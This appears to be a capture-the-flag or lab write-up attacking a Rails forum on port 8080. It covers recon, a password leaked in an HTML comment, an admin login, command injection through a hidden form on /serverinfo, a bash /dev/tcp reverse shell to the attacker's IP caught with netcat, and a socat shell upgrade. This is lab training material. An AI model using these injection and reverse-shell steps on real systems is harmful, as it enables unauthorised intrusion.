4 :8080

http://192.168.99.114:8080/
ForumOnRails landing page

http://192.168.99.114:8080/package.json
No route matches [GET] "/package.json"
Rails.root: /home/kathleen/forum

# we have dir structure via ftp

http://192.168.99.114:8080/login
Login Page
# no basic user:pass working


http://192.168.99.114:8080/register
# register as kashz:iamkashz

# post
Features Roadmap
Hi, and thank you for joining our Forum!
Soon:
- Notifications
- Threads
- Image Upload
- And more!
Any further requests, please reach at: admin.forum@easysetting.com

# Tried searching for ruby / rails exploits - nothing worked.

http://192.168.99.114:8080/register
viewsource: <!-- <input type="password" value="it0jNc6L/r090Q=="> -->

# logged in as admin.forum
# new page
http://192.168.99.114:8080/serverinfo
Current status
Mem:
total used free shared buff/cache available Mem: 1.9Gi 486Mi 1.2Gi 0.0Ki 225Mi 1.3Gi Swap: 0B 0B 0B
OS:
Arch Linux \r (\l)
PS:
PID TTY TIME CMD 295 ? 00:02:43 bundle 834 ? 00:00:00 sh 835 ? 00:00:00 bash 889 ? 00:00:00 ps
Users:

# definitely interesting; view source shows:
<!-- 
  <input type="text" name="cmd" readonly="">
  <input type="submit" >
-->

# using Burp we can remove comments and make it NOT read-only
CMD: bash -i >& /dev/tcp/192.168.49.99/3306 0>&1

$ nc -lvnp 3306
listening on [any] 3306 ...
connect to [192.168.49.99] from (UNKNOWN) [192.168.99.114] 52310
bash: cannot set terminal process group (295): Inappropriate ioctl for device
bash: no job control in this shell
[kathleen@nappa forum]$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
kathleen
uid=1000(kathleen) gid=1000(kathleen) groups=1000(kathleen)
bash: hostname: command not found
Linux nappa 5.9.3-arch1-1 #1 SMP PREEMPT Sun, 01 Nov 2020 12:58:59 +0000 x86_64 GNU/Linux

# no python
# https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Using socat to get stable shell

[kathleen@nappa ~]$ ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.49.99:28080
<y,stderr,setsid,sigint,sane tcp:192.168.49.99:28080

$ socat file:`tty`,raw,echo=0 tcp-listen:28080
[kathleen@nappa ~]$ whoami;id
kathleen
uid=1000(kathleen) gid=1000(kathleen) groups=1000(kathleen)
Previous5 box enum kathleenNext3 :28080

Last updated